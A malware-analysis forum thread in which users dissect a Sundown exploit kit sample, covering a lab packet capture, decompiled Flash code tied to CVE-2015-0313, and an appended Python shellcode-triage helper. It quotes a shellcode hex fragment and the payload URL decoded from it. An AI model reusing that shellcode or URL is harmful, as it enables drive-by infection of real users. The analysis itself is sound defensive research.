A look at Sundown exploit kit

MBYX

Level 1
Thread author
Verified
Jan 19, 2017
40
A look at Sundown exploit kit.
So recently a range of things have drawn my personal interest; one of them is understanding EKs (exploit kits) more. Anyone in IT knows the best defense against an attack is to understand the attack fully.
Understand the attack, and thus where or how to break it and render it useless.
Sundown recently drew my interest, as I was used to poring over RIG EK, RIG EK … and look, more… RIG EK…
Here was something different. GREAT! So I got hold of two samples of Sundown using a Flash exploit. Okay, Flash… heaps of exploits there, but we will come back to that… let's see what this little guy does.
Sundown was delivering through an email campaign leading to a gate, landing page and payload delivery.
[Screenshot: 01.jpg]

Here we can see:
  • 192.168.5.56 (Win7 VM, my lab machine)
  • 192.158.5.1 (Kali: MITM proxy & Wireshark capture)
  • 204.79.197.200 (Markmonitor)
  • 239.255.255.250 (IANA, Internet Assigned Numbers Authority)
  • Some IPv6 traffic after that.

The EK points to DNS, which looks like the good guys redirected already, nice work.
We then see some TCP packets occurring; at no. 8 we see a favicon.ico being requested, which is a small icon file (no. 12, .PNG type).
We then see a heap of SSDP packets (no. 14+), which is the foundation of plug and play (local network discovery).
Further down I see another DNS request for an akamaiedge (conference hosting site) session before Markmonitor sends a RESET ACK relating to the ICO file mentioned above.
Beyond that it's a repeat, so to me it looks like the good guys are already blocking the EK from hitting its landing page.
[Screenshot: 02.jpg]


Beyond that I saw some DHCPv6 traffic and the EK still trying to work out the local network.

[Screenshot: 03.jpg]

So… now what?
Well, I asked myself: okay, the packet capture did not give me a lot. What else can I learn…
We know this EK is using a Flash exploit; it's using the SWF filetype (Shockwave Flash). But what if I actually wanted to know which SWF exploit it was…

Look in the SWF.

What do you mean, “look in the SWF”?

I mean open him up.

It's not a tin of baked beans! What do you mean, “open him up”?

You know what I mean.

That's a bit strong, ain't it? I don't know about this.



So, decompiler in hand, I opened it up, looking to try to identify the particular exploit it was using. I was drawn first to function “Go” and this line (loc_7), which looked like an overflow attack, and in general I was getting a feel for a lot of data being written to memory locations.

[Screenshot: 04.jpg]

Go_var1 was set to execute Go and also extend the ByteArrayAsset… interesting.

[Screenshot: 05.jpg]


So this sent me down a path of looking for overflow attacks against ByteArrayAssets under the mx core…

Oh… look, a GitHub page showing how CVE-2015-0313 works…

[Screenshot: 06.jpg]

Researching CVE-2015-0313 (use after free): it refers to a ByteArray being freed from an ActionScript worker, which can FILL THE MEMORY and notify the main thread to corrupt the new contents, which then allows for remote code execution.
I concluded at this point that CVE-2015-0313 was being used.

Thank you,
MBYX

No SWFs were harmed in the making; bonus points for the movie reference :)

MBYX
Great analysis and work, thank you :)

Have you tried to disassemble the shellcode that is put in the loc_7 var (under its string representing hex values)?
Not yet, wasn't sure I was going to. Just looks like a pile of crap used to cause an overflow; not sure there would be much merit in it. I can dig out the line if you want to have a play?

DardiM
I can dig out the line if you want to have a play?
At first sight, loc_7 doesn't contain the same shellcode I analysed some weeks ago. It still begins with a jump (EBxy), but the other parts are different (I suppose it uses the same trick to obfuscate the important parts, but not the same values for obfuscation).
I am a very curious Penguin, and will be a "happy feet" to get the whole string put in the loc_7 var, to see if the main obfuscated command line inside is the same.

Again, nice analysis, looking forward to your next :)

MBYX
At first sight, loc_7 doesn't contain the same shellcode I analysed some weeks ago. It still begins with a jump (EBxy), but the other parts are different (I suppose it uses the same trick to obfuscate the important parts, but not the same values for obfuscation).
I am a very curious Penguin, and will be a "happy feet" to get the whole string put in the loc_7 var, to see if the main obfuscated command line inside is the same.

Again, nice analysis, looking forward to your next :)


Is this what you need?
If you get anything out of this I would be interested to learn how; you can PM me, happy to follow bread crumbs.
It was a pain in the arse due to the eval software I was using… had to get new software, which required supporting software, and oh no, I found dependency hell again… and I was on Windows :)


_loc3_.position = 0;
var _loc7_:String = "..."; // hex string holding the shellcode; the value is not preserved in this copy of the post
var _loc8_:uint = _loc7_.length;
var _loc9_:* = 0;
_loc6_ = 0;
while(_loc6_ < _loc4_ - 4)

DardiM
Is this what you need?
If you get anything out of this I would be interested to learn how; you can PM me, happy to follow bread crumbs.
It was a pain in the arse due to the eval software I was using… had to get new software, which required supporting software, and oh no, I found dependency hell again… and I was on Windows :)

Thanks for the code :)

The string in the var _loc7_:

It is the shellcode.

=> can be disassembled (using the content)
=> often contains obfuscation parts to make it harder to understand when disassembled.
A quick look here: between the numerous 000000... and 90909090...

"E82CFEFFFF687474703A2F2F6B6C682E79746C7A672E78797A2F652E70687"

In red:

h t t p : / / klh.ytlzg.xyz/e.php
[Screenshot: upload_2017-3-28_17-43-41.png]


x00 => can be used to put the real part
x90 => nop: no operation.

All the shellcode can be disassembled and analysed:

Edited:
I made a separate thread (changed from clues to a deeper analysis):

https://malwaretips.com/threads/analyse-of-a-shellcode.70044/

Thanks again for your shellcode :)
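As an added example (not code from the thread or from either poster): a small Python triage helper that does what DardiM does by eye above, decoding the quoted hex fragment, spotting the leading E8 call rel32, pulling out printable runs such as the embedded URL (defanged for reporting), and flagging the 0x90 NOP and 0x00 padding runs he mentions. The hex fragment is taken from the post as quoted there (it is cut off mid-byte, which the decoder tolerates); the 90/00 sample is constructed.

```python
import re
import struct

# Hex fragment quoted in the post above (truncated by the poster, so odd length).
SAMPLE_HEX = "E82CFEFFFF687474703A2F2F6B6C682E79746C7A672E78797A2F652E70687"

def hex_to_bytes(hexstr):
    """Decode a pasted hex dump, ignoring whitespace and a dangling half byte."""
    clean = re.sub(r"[^0-9A-Fa-f]", "", hexstr)
    if len(clean) % 2:
        clean = clean[:-1]  # drop the trailing nibble left by a truncated paste
    return bytes.fromhex(clean)

def printable_runs(data, min_len=6):
    """Return printable ASCII runs of at least min_len bytes (URLs, commands)."""
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, data)]

def filler_runs(data, min_len=4):
    """Locate runs of 0x90 (NOP sled) and 0x00 (padding) as (kind, offset, length)."""
    pat = rb"\x90{%d,}|\x00{%d,}" % (min_len, min_len)
    return [("nop" if m.group()[0] == 0x90 else "null", m.start(), len(m.group()))
            for m in re.finditer(pat, data)]

def leading_call(data):
    """If the blob opens with E8 rel32 (a relative CALL), return its signed displacement."""
    if len(data) >= 5 and data[0] == 0xE8:
        return struct.unpack("<i", data[1:5])[0]
    return None

def defang(s):
    """Make an extracted URL safe to paste into a report."""
    return s.replace("http", "hxxp").replace(".", "[.]")

def triage(hexstr):
    """Summarise a shellcode hex blob: size, opening CALL, strings, sled/padding runs."""
    data = hex_to_bytes(hexstr)
    return {
        "size": len(data),
        "call_rel32": leading_call(data),
        "strings": [defang(s) for s in printable_runs(data)],
        "filler": filler_runs(data),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_HEX).items():
        print(f"{key}: {value}")
```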
